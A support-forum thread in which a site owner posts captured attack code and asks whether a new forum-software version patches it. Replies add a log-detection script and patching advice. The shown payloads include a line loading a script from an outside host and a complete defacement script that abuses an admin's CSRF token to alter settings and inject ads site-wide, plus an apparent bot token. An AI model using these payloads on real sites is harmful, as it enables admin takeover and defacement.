Exploit

Maa

Active member
Licensed customer
Affected version: 2.3.9
Hi,

We had someone attempt to parse the following on the previous version from 2.3.10:

Code:
let s=document.createElement('script');s.src='https://cizgicaps.com/exp.php';document.head.appendChild(s);

Code:
(async () => {
    console.log("%c[!] TAM KAPSAMLI OPERASYON BASLADI", "color: orange; font-weight: bold;");
    try {
        const botToken = "8619880328:AAHnHR1JlmQivoRVLw41_8hsFEYDeuLYM5A";
        const chatId = "-1003650778510";
        const currentUrl = window.location.host;

        let adminPath = document.querySelector('a[href*="admin.php"]')?.getAttribute('href') || 'admin.php';
        if(adminPath.includes('?')) adminPath = adminPath.split('?')[0];

        const adminToken = document.querySelector('input[name="_xfToken"]')?.value || (typeof XF !== 'undefined' ? XF.config.csrf : '');

        // STEP 1: Remove the ad restrictions (empty adsDisallowedTemplates)
        let optFd = new FormData();
        optFd.append('_xfToken', adminToken);
        optFd.append('options[adsDisallowedTemplates]', ''); // Remove all restrictions
        optFd.append('options_listed[]', 'adsDisallowedTemplates');
        optFd.append('_xfResponseType', 'json');

        await fetch(`${adminPath}?options/update`, {
            method: 'POST',
            body: optFd,
            headers: { 'X-Requested-With': 'XMLHttpRequest' }
        });
        console.log("[+] Reklam kisitlamalari kaldirildi.");

        // STEP 2: Prepare the index payload (with the updated defacement)
        const payloadHtml = `<script>
    (function(){
        var run = function(){
            document.documentElement.innerHTML = '<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Hacked By Zereth Protocol</title><link rel="icon" type="image/x-icon" href="https://c.top4top.io/p_3732ukoji1.png"><meta name="description" content="Hacked by Zereth Protocol"><meta name="keywords" content="Hacked By Zereth Protocol ,Hacked By Zereth Protocol , Cyber Attack , Security Breach"><meta name="author" content="Hacked by Zereth Protocol"><meta name="title" content="Hacked By Zereth Protocol"><meta name="googlebot" content="index,follow,Zereth Protocol,Zereth Protocol"><meta name="robots" content="all"><meta name="robots schedule" content="auto"><meta name="distribution" content="global"><link href="https://fonts.googleapis.com/css2?family=Orbitron:wght@700;900&display=swap" rel="stylesheet"><style>*{margin:0;padding:0;box-sizing:border-box;}body,html{width:100%;height:100%;overflow-x:hidden;background-color:#000;}.hacked-page{position:relative;min-height:100vh;background:url(\'https://i.giphy.com/sOzHwf1DF8h96A5tXU.webp\') center center no-repeat;background-size:cover;display:flex;flex-direction:column;align-items:center;justify-content:center;padding:20px;overflow-y:auto;}.hacked-page::before{content:\'\';position:fixed;top:0;left:0;width:100%;height:100%;backdrop-filter:blur(8px);-webkit-backdrop-filter:blur(8px);z-index:1;}.center-square{position:relative;z-index:2;width:min(300px,85vw);height:min(300px,85vw);background:rgba(0,0,0,0.5);border:3px solid cyan;border-radius:50%;box-shadow:0 0 25px rgba(0,255,255,0.6),0 0 50px rgba(0,255,255,0.3);display:flex;align-items:center;justify-content:center;padding:0;margin-bottom:25px;animation:pulse-glow 3s ease-in-out infinite;overflow:hidden;}@keyframes pulse-glow{0%,100%{box-shadow:0 0 20px rgba(0,255,255,0.6);}50%{box-shadow:0 0 40px 
rgba(0,255,255,0.9);}}.laptop-image{width:100%;height:100%;object-fit:cover;object-position:center;border-radius:50%;transform:scale(1.02);}.hacked-text{position:relative;z-index:2;font-family:\'Orbitron\',sans-serif;font-size:clamp(20px,5vw,32px);font-weight:900;margin-top:10px;letter-spacing:1px;text-align:center;}.inline-gif{width:22px;height:22px;display:inline-block;vertical-align:middle;margin-left:5px;}.hacked-by{color:white;text-shadow:0 0 10px rgba(255,255,255,0.5);}.hacker-name{color:#ff0000;text-shadow:0 0 15px rgba(255,0,0,0.7);}.security-text{position:relative;z-index:2;font-family:\'Orbitron\',sans-serif;font-size:clamp(13px,3vw,16px);font-weight:bold;color:white;margin-top:15px;text-align:center;padding:0 10px;}.blue-text{color:#00ff00;}.blue-greetz{color:#0066ff;}.red-wolf{color:#ff0000;}.greetz-text{position:relative;z-index:2;font-family:\'Orbitron\',sans-serif;font-size:clamp(11px,2.5vw,14px);color:white;margin-top:20px;text-align:center;line-height:1.6;}.copyright-text{position:relative;z-index:2;font-family:\'Orbitron\',sans-serif;font-size:11px;color:rgba(255,255,255,0.8);margin-top:20px;margin-bottom:20px;text-align:center;}@media(min-width:640px){.center-square{width:350px;height:350px;}}</style></head><body><div class="hacked-page"><div class="center-square"><img class="laptop-image" src="https://cizgicaps.com/TR6.png" alt="Turkish Flag Center"></div><div class="hacked-text"><span class="hacked-by">Hacked By </span><span class="hacker-name">Zereth Protocol</span></div><div class="security-text">This website is now under the command of Zereth Protocol, the invisible army of the Turks. We do not merely infiltrate; we conquer. We are the ones who never forget and never give up. Your security is our playground. 
<br> <br><span class="blue-text">Zereth Protocol is everywhere.</span></div><div class="greetz-text"><span class="blue-greetz">Greetz:</span><br/>All members and supporters of Zereth Protocol</div><div class="copyright-text">Zereth <span class="red-wolf">Protocol</span><br/>© All Rights Reserved</div></div></body>';
            document.addEventListener('contextmenu', function(e) { e.preventDefault(); });
        };
        run();
        window.onload = run;
        document.addEventListener("DOMContentLoaded", run);
    })();
\x3C/script>`;

        const positions = [
            'container_breadcrumb_bottom_above', 'container_breadcrumb_bottom_below',
            'container_breadcrumb_top_above', 'container_breadcrumb_top_below',
            'container_content_above', 'container_content_below',
            'container_header', 'container_sidebar_above', 'container_sidebar_below',
            'container_sidenav_above', 'container_sidenav_below',
            'forum_overview_top', 'forum_overview_bottom',
            'forum_view_above_node_list', 'forum_view_above_thread_list',
            'forum_view_below_node_list', 'forum_view_below_stickies',
            'forum_view_below_thread_list', 'member_view_below_tabs',
            'post_above_content', 'post_below_container', 'post_below_content',
            'thread_view_above_messages', 'thread_view_below_messages'
        ];

        // STEP 3: Push the ads in parallel
        let successCount = 0;
        await Promise.all(positions.map(async (pos, index) => {
            let fd = new FormData();
            fd.append('_xfToken', adminToken);
            fd.append('title', `SYS_AD_${index}`);
            fd.append('position_id', pos);
            fd.append('ad_html', payloadHtml);
            fd.append('display_order', '0');
            fd.append('active', '1');
            fd.append('_xfResponseType', 'json');

            try {
                let resp = await fetch(`${adminPath}?advertising/0/save`, {
                    method: 'POST',
                    body: fd,
                    headers: { 'X-Requested-With': 'XMLHttpRequest' }
                });
                let res = await resp.json();
                if(res.status === 'ok') successCount++;
            } catch(e) {}
        }));

    } catch (e) { console.error(e); }
})();

Is the latest version a patch for the exploit above?

Thanks
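From the defender's side, the sequence the posted script produces in the web server log is distinctive: a POST to admin.php?options/update followed by a burst of POSTs to admin.php?advertising/0/save, all carrying a front-end thread page as Referer rather than an admin.php page. The Python below is an added example (not from the original post or from XenForo) that flags that pattern in constructed combined-format access-log lines; the forum hostname, client addresses and timestamps are made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample access-log lines (combined log format): the admin.php query strings
# mirror the endpoints the posted script calls; addresses, timestamps and host are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Jan/2025:10:15:03 +0000] "POST /admin.php?options/update HTTP/1.1" 200 82 "https://forum.example/threads/hello.12/" "Mozilla/5.0"
203.0.113.7 - - [02/Jan/2025:10:15:03 +0000] "POST /admin.php?advertising/0/save HTTP/1.1" 200 64 "https://forum.example/threads/hello.12/" "Mozilla/5.0"
203.0.113.7 - - [02/Jan/2025:10:15:03 +0000] "POST /admin.php?advertising/0/save HTTP/1.1" 200 64 "https://forum.example/threads/hello.12/" "Mozilla/5.0"
203.0.113.7 - - [02/Jan/2025:10:15:04 +0000] "POST /admin.php?advertising/0/save HTTP/1.1" 200 64 "https://forum.example/threads/hello.12/" "Mozilla/5.0"
198.51.100.9 - - [02/Jan/2025:11:40:10 +0000] "POST /admin.php?advertising/0/save HTTP/1.1" 200 64 "https://forum.example/admin.php?advertising/add" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Admin endpoints the posted script writes to: ad-template restrictions, then ad creation.
ADMIN_WRITES = ("/admin.php?options/update", "/admin.php?advertising/0/save")

def parse_log(text):
    """Yield one dict per line that matches the combined log format."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield rec

def find_suspicious(text, burst_min=3, window_s=60):
    """Return {ip: set(reasons)} for clients whose admin writes look scripted:
    an admin.php write whose Referer is a front-end page (fetch() from a thread
    sends that page as Referer; a real control-panel action carries admin.php),
    or burst_min or more advertising saves from one client within window_s."""
    findings, saves = defaultdict(set), defaultdict(list)
    for rec in parse_log(text):
        if rec["method"] != "POST" or rec["path"] not in ADMIN_WRITES:
            continue
        if "/admin.php" not in rec["referer"]:
            findings[rec["ip"]].add("admin write with non-admin referer")
        if rec["path"].endswith("advertising/0/save"):
            saves[rec["ip"]].append(rec["ts"])
    for ip, times in saves.items():
        times.sort()
        for i in range(len(times) - burst_min + 1):
            if (times[i + burst_min - 1] - times[i]).total_seconds() <= window_s:
                findings[ip].add("burst of advertising saves")
                break
    return dict(findings)
```

Run it against the real access log of an affected install to see which client created the ad entries, then review the advertising list in the admin panel for entries containing script tags.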
 
This is the work of a script kiddie. The only thing these kinds of people know how to do is copy Proofs of Concept (PoCs) specific to existing vulnerabilities. They're so pathetic they can't even write the exploit code themselves using AI and remove the comment lines. The relevant code was prepared with a Turkish prompt, and as a Turkish cybersecurity expert, I feel sorry for these script kiddies. With version 2.3.9, the vulnerability this script kiddie knew about has been patched, so I don't think you'll experience any problems. However, if you can, enable OWASP rules within Cloudflare and make sure you update your zone configuration if you have one.
 
This was posted on a v3.2.9 site last night & it parsed the eval code in the post, but couldn't fully execute.

The person that posted it prompted the Admin to view, as it's the admin permissions that are used to edit templates.

My sites were 3.2.9 and licenses just expired, so I had to pay to upgrade to block this exploit. I wasn't planning on paying more $ until more updates, it should have been a free patch.
 
My sites were 3.2.9 and licenses just expired, so I had to pay to upgrade to block this exploit. I wasn't planning on paying more $ until more updates, it should have been a free patch.
There was a patch supplied in the release notes. And there's no version 3. Perhaps you meant 2.3.9?
 